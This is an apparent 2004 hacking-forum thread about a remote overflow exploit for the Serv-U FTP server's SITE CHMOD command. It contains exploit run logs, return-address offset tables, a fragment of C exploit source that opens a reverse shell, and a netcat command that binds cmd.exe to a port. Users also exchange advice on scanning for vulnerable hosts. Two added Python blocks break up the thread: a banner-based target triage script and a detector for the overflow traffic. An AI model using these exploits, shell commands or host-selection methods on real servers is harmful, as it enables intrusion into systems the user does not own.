[type]:
  0  0x7ffa4a1b  Serv-U v3.0.0.20~v4.1.0.11  GB  2K/XP ALL
  1  0x7ffa2186  Serv-U v3.0.0.20~v4.1.0.11  BG  2K/XP ALL
  2  0x6dee6713  Serv-U v3.0.0.20~v4.1.0.11  KR  2K SP4
  3  0x77886713  Serv-U v3.0.0.20~v4.1.0.11  EN  2K SP4
  4  0x76b42a3a  Serv-U v3.0.0.20~v4.1.0.11  EN  XP SP1
Have a nice day.
x1`
Jan 26 2004, 09:48 PM
What if you don't know the user and password?
Also, how do you type the port: ip port or ip:port?
ADiCToJUeGO
Jan 26 2004, 09:48 PM
THX! Good Work
AlessandroIT
Jan 26 2004, 09:49 PM
I think it doesn't work... It crashes the whole FTP server.
h:\servu>servu -i *.*.*.* -t 0 -u alez -p alez -d temp -f 5554 -s 80
Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0
Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com;r
9:/temp/xxx
[+] Connect to *.*.*.*:5554 success.
[+] Recv: 220 Serv-U FTP Server v4.1 for WinSock ready...
[+] Send: USER alez
[+] Recv: 331 User name okay, need password.
[+] Send: PASS alez
[+] Recv: 230 User logged in, proceed.
[+] Send: TYPE I
[+] Recv: 200 Type set to I.
[+] Send shellcode 808 bytes.
[+] If you don't have a shell it didn't work.
[+] Connect to shell...
[-] Exploit seem failed.
h:\servu>
It always says that.
ThEWaTcHeR
Jan 26 2004, 10:00 PM
Many thanks totof, I will test it.
-=[MePhIsTo]=-
Jan 26 2004, 10:02 PM
Many thanks, hope it works.
jubbly
Jan 26 2004, 10:24 PM
Thanks for this, I'm gonna test it on my workbench PC and maybe update or even stop using my Serv-U.
9:/c:\/xxxx
[+] Connect to 192.168.0.4:5551 success.
[+] Bind port on 192.168.0.4:1234 success.
[+] Recv: 220 BB Microsoft FTP Service (Version 5.0).
[+] Send: USER admin1
[+] Recv: 331 User name okay, need password.
[+] Send: PASS cheffe01
[+] Recv: 230-blackblizzard server system
[+] Send: PORT 192,168,0,4,4,210
[+] Recv: 230-blackblizzard server system
[+] Send shellcode 791 bytes.
[+] If you don't have a shell it didn't work.
[+] Wait for shell...
But I didn't get a shell.
black
Milka
Jan 26 2004, 10:36 PM
Got the same as blackP0ster, hmm.
Hellraiseruk
Jan 26 2004, 10:43 PM
Heard it doesn't work, but I'll give it a go. Cheers m8.
EXPLOiTED
Jan 26 2004, 11:40 PM
220- ñ 0 Hours
[+] Send: PASS god
[+] Recv: 220-|ñ 0 Minutes
[+] Send: TYPE I
[+] Recv: 220- ñ 7 Seconds
[+] Send shellcode 807 bytes.
[+] If you don't have a shell it didn't work.
[+] Connect to shell...
[-] Exploit seem failed.
C:\>
DAN.. no shell yet..... Good work, but let's get that shell working!
T3cHn0b0y
Jan 26 2004, 11:55 PM
Crashes the server but doesn't execute any arbitrary code, or the correct code at least.
Even if the exploit worked, the person would still need permission to create directories. Dangerous to RAQ admins etc. I guess... but nobody's changing the directory structure of my FS except me!
Wolfman
Jan 27 2004, 04:37 AM
I've made a few tests myself, also without any luck. All I get is to stop Serv-U. Another "DoS" tool.
Tom
Jan 27 2004, 06:40 AM
Your site is down.
jubbly
Jan 27 2004, 07:49 AM
/me feels a little stupid, but what is cbhost?
Also blackP0ster, from the banner you received you're trying it against the wrong kind of FTP server, d'oh, unless it's customised:
CODE
[+] Recv: 220 BB Microsoft FTP Service (Version 5.0).
doesn't exactly look like serv-u does it?
^RB^
Jan 27 2004, 09:31 AM
QUOTE (jubbly @ Jan 27 2004, 08:49 AM)
/me feels a little stupid, but what is cbhost?
Also blackP0ster, from the banner you received you're trying it against the wrong kind of FTP server, d'oh, unless it's customised:
CODE
[+] Recv: 220 BB Microsoft FTP Service (Version 5.0).
doesn't exactly look like serv-u does it?
In Serv-U you can put whatever you want in that line... And since he was testing it on his own network (192.168.*.*) I *think* he's pretty sure he was using Serv-U...
Thanks for the tool though!!!!
^RB^
OleaSTeR
Jan 27 2004, 12:27 PM
This exploit works fine...
c:\>servu -i 192.168.0.1 -t 3 -u oleaster -p XXXX -f 21 -c 127.0.0.1 -s 5555
Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0
Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com;r
dir
 Volume in drive C has no label.
 Volume Serial Number is F401-144A

 Directory of C:\
 ... ... ...
==========
target description:
Serv-U FTP Server v4.2 beta (4.1.0.8)
Kernel version: Microsoft Windows 2000, Uniprocessor Free
Product type: Server
Product version: 5.0
Service pack: 4
Kernel build number: 2195
=============
x1`
Jan 27 2004, 01:34 PM
What's the point in hacking it if I know the password? It would be better for an exploit with no pass needed.
Thom
Jan 27 2004, 01:46 PM
I agree with dicky, what's the point? If you've got pass and user you can always site exec nc.exe -d -t -L -p 666 -e cmd.exe...
Double-=V=-
Jan 27 2004, 01:59 PM
There are many anonymous Serv-U FTP servers that allow anonymous to make dirs.
Checkz
Jan 27 2004, 02:13 PM
QUOTE (Double-=V=- @ Jan 27 2004, 01:59 PM)
There are many anonymous Serv-U FTP servers that allow anonymous to make dirs.
Never saw one.
AlessandroIT
Jan 27 2004, 02:22 PM
QUOTE (Checkz @ Jan 27 2004, 02:13 PM)
QUOTE (Double-=V=- @ Jan 27 2004, 01:59 PM)
There are many anonymous Serv-U FTP servers that allow anonymous to make dirs.
Never saw one.
Most of the anonymous ones.
It works perfectly!!!
ivan288
Jan 27 2004, 02:32 PM
Nice work guys, will try it. Thanks.
Soulwax
Jan 27 2004, 03:01 PM
Thanks a lot, gonna check this one out. I'll tell later if it worked for me.
Soulwax
blackP0ster
Jan 27 2004, 03:05 PM
I've changed my banner.. working with Serv-U 4.1.
But what's the effect of that exploit? If you have the user+pwd of an FTP server and the rights, you can always do what you want. I don't need that exploit, do I?
jead99
Jan 27 2004, 03:22 PM
Thanks for sharing the info, the exploit works fine
x1`
Jan 27 2004, 03:25 PM
So do you leave it blank if it's anonymous, or what? What would the command look like?
x1`
Jan 27 2004, 04:24 PM
OK, what's the best way to scan for this?
I used DSNS scanner for port 21, then FX scanner to test for anonymous login. How can I load a list of IPs that will get the Serv-U banners only?
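Since the question above is how to get only the Serv-U hosts out of a port-21 sweep, here is an added example, written for this edit and not taken from the thread or from the exploit authors, that does the banner side of that offline: it parses the 220 greeting and compares the advertised version with the range in the exploit's target table (v3.0.0.20~v4.1.0.11). The greetings in it are constructed, not captured, and the host names are made up. It also encodes the limitation ^RB^ raised earlier: the 220 line is admin-editable in Serv-U, so a greeting that does not say Serv-U proves nothing, and the stock greeting only says "v4.1" without the build number, so it can only ever be a candidate, not a confirmed hit.

```python
import re

# Affected range exactly as the exploit's target table on this page lists it:
# Serv-U v3.0.0.20 through v4.1.0.11. Builds outside it are only "not in the
# table", not proven safe.
AFFECTED_MIN = (3, 0, 0, 20)
AFFECTED_MAX = (4, 1, 0, 11)

# Constructed greetings (not captured from real hosts). host-c stands in for the
# case raised earlier in the thread: Serv-U lets the admin replace the 220 line,
# so a banner that doesn't say Serv-U does not prove the server isn't Serv-U.
SAMPLE_BANNERS = {
    "host-a": "220 Serv-U FTP Server v4.1 for WinSock ready...",
    "host-b": "220 Serv-U FTP Server v4.1.0.11 for WinSock ready...",
    "host-c": "220 BB Microsoft FTP Service (Version 5.0).",
    "host-d": "220 Serv-U FTP Server v5.0 for WinSock ready...",
    "host-e": "220 Serv-U FTP Server v2.5 for WinSock ready...",
}

BANNER_RE = re.compile(r"Serv-U FTP Server v(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_servu_version(banner):
    """Version tuple from a Serv-U 220 greeting, or None if it doesn't name Serv-U."""
    m = BANNER_RE.search(banner)
    if m is None:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def classify(banner):
    """One of: not-servu, affected, possibly-affected, not-affected."""
    v = parse_servu_version(banner)
    if v is None:
        return "not-servu"
    if len(v) < 4:
        # The stock greeting ("v4.1") omits the build number, and 4.1 covers
        # both the builds in the table and builds after it; compare only the
        # fields present and report a candidate, not a confirmed hit.
        n = len(v)
        if AFFECTED_MIN[:n] <= v <= AFFECTED_MAX[:n]:
            return "possibly-affected"
        return "not-affected"
    if AFFECTED_MIN <= v <= AFFECTED_MAX:
        return "affected"
    return "not-affected"


def triage(banners):
    """Map each host to its classification; feed it a dict from a banner sweep."""
    return {host: classify(b) for host, b in banners.items()}


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_BANNERS).items():
        print(host, verdict)
```

Anything reported as possibly-affected still needs the build number from somewhere else (the admin console, the file version of the binary, or the exploit's own target/offset test on a box you own), and a host-c style greeting should go in the "verify by other means" pile rather than the "skip" pile.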
Double-=V=-
Jan 27 2004, 04:54 PM
If I were to scan for this, I would do scan500, then scanline, then grim's ping.
BLaCkOuT
Jan 27 2004, 05:44 PM
Nice work.
night^man
Jan 27 2004, 06:26 PM
Thanks, very nice, works perfectly ;]
seppel18
Jan 28 2004, 12:16 AM
Doesn't work for me.
Tested with Serv-U 4.1.0.3 on Win2k SP4 English with the 0x77886713 offset.
No shell....
Anarchy
Jan 29 2004, 03:23 AM
#3
CODE
/*
 * date: 25 Jan 2004
 * software: Serv-U 4.1.0.0 (prolly others)
 * vendor: RhinoSoft, http://www.serv-u.com/
 * credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
 * greets: rosecurity team, int3liban
 * notes: should work on any NT, reverse bindshell, terminates the process
 *        properly, handles directories
 * author: mandragore, sploiting@mandragore.solidshells.com
 *
 * cheap changelog:
 * 27 jan 2004: improved banners handling (select()'s), added listener,
 *              default ip gathering (needs ifconfig & gawk)
 */

        /* tail of the interactive shell loop: relay stdin to the socket
           and socket data back to stdout */
        if (FD_ISSET(0,&fds)) {
            /* fd 0 is the one select() reported readable; the posted code
               read from fd 1, which only works when stdout is a tty */
            ret = read(0,buff,4096);
            send(sn,buff,ret,0);
        }
        if (FD_ISSET(sn,&fds)) {
            if ( (ret=recv(sn,buff,4096,0)) < 1 ) fatal("[-] shell.recv");
            write(1,buff,ret);
        }
    }
}

void killchild() { printf("[-] got signal from parent, exiting.\n"); exit(1); }
void killmain()  { printf("[-] got signal from child, exiting.\n");  exit(1); }

int main(int argc, char **argv)
{
    short port=21;
    int target=0;
    int i, pid;
    int delta=423;
    int callebx=0x10077A92;                                 // libeay32.dll
    char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90";  // jmp -256
    char chmod[]="SITE CHMOD 777 ";

    printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");
    lhost=getip();
    if (argc<2) usage(argv[0]);

    /* -d target, -p port, -u user, -s pass, -w path, -H/-P listener, -v verbose */
    while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
        switch (i) {
            case 'd': target=inet_addr(optarg); break;
            case 'p': port=atoi(optarg);        break;
            case 'u': user=optarg;              break;
            case 's': pass=optarg;              break;
            case 'w': path=optarg;              break;
            case 'H': lhost=inet_addr(optarg);  break;
            case 'P': lport=atoi(optarg);       break;
            case 'v': verbose=atoi(optarg);     break;
            default:  usage(argv[0]);           break;
        }
    }

    if ((target==-1) || (lhost==-1) || (lhost==0)) usage(argv[0]);

    printf("[.] if working you'll have a shell on %s:%d.\n",
           inet_ntoa(*(struct in_addr *)&lhost),lport);
    printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n",
           user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
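The fragment above sets delta=423 and sends "SITE CHMOD 777 " followed by attacker-controlled data, and the exploit outputs earlier in the thread report 790-810 bytes of shellcode going over the FTP control channel. That shape is easy to spot from the defender's side. The following is an added example, not code from this thread or from mandragore's or lion's exploits, that walks a constructed FTP command stream and flags SITE CHMOD requests whose argument is far too long for an octal mode plus a path, or contains non-printable bytes. The sample commands are made up for the example and the 256-byte limit is an assumed threshold.

```python
import re

# Constructed sample of one FTP control-channel session (not captured traffic).
# Entry 5 mimics the shape the exploits in this thread send: "SITE CHMOD 777 "
# followed by several hundred bytes of filler, a few raw jump bytes and a NOP
# sled, which is nothing like a mode plus a path.
SAMPLE_COMMANDS = [
    b"USER alez\r\n",
    b"PASS alez\r\n",
    b"TYPE I\r\n",
    b"MKD temp\r\n",
    b"SITE CHMOD 777 temp/file.txt\r\n",
    b"SITE CHMOD 777 " + b"A" * 423 + b"\xe9\xff\xfe\xff\xff\xeb\xf9" + b"\x90" * 300 + b"\r\n",
    b"SITE CHMOD 777 " + b"B" * 9000 + b"\r\n",
]

# Assumed threshold: a legitimate SITE CHMOD argument is an octal mode and a
# path, and Windows paths stay well under this.
MAX_PATH_ARG = 256

SITE_CHMOD_RE = re.compile(rb"^SITE\s+CHMOD\s+(\S+)\s*(.*)$", re.IGNORECASE | re.DOTALL)
MODE_RE = re.compile(rb"[0-7]{3,4}")


def inspect_command(raw):
    """Return None for commands that are not SITE CHMOD, otherwise a list of
    reasons the request looks like an overflow attempt (empty if it looks sane)."""
    line = raw.rstrip(b"\r\n")
    m = SITE_CHMOD_RE.match(line)
    if m is None:
        return None
    mode, path = m.group(1), m.group(2)
    reasons = []
    if MODE_RE.fullmatch(mode) is None:
        reasons.append("mode %r is not an octal mode" % mode)
    if len(path) > MAX_PATH_ARG:
        reasons.append("path argument is %d bytes (limit %d)" % (len(path), MAX_PATH_ARG))
    if any(b < 0x20 or b > 0x7e for b in path):
        reasons.append("path argument contains non-printable bytes")
    return reasons


def scan_commands(commands):
    """Run inspect_command over a command list; return (index, reasons) for hits."""
    alerts = []
    for idx, raw in enumerate(commands):
        reasons = inspect_command(raw)
        if reasons:
            alerts.append((idx, reasons))
    return alerts


if __name__ == "__main__":
    for idx, reasons in scan_commands(SAMPLE_COMMANDS):
        print("command #%d: %s" % (idx, "; ".join(reasons)))
```

The check belongs wherever the control channel is visible in clear (an inline FTP proxy, an IDS rule, or Serv-U's own command log), and it only catches this family of bug; a server that still accepts SITE CHMOD from accounts that can create directories, which is what the exploit needs, should be upgraded rather than just watched.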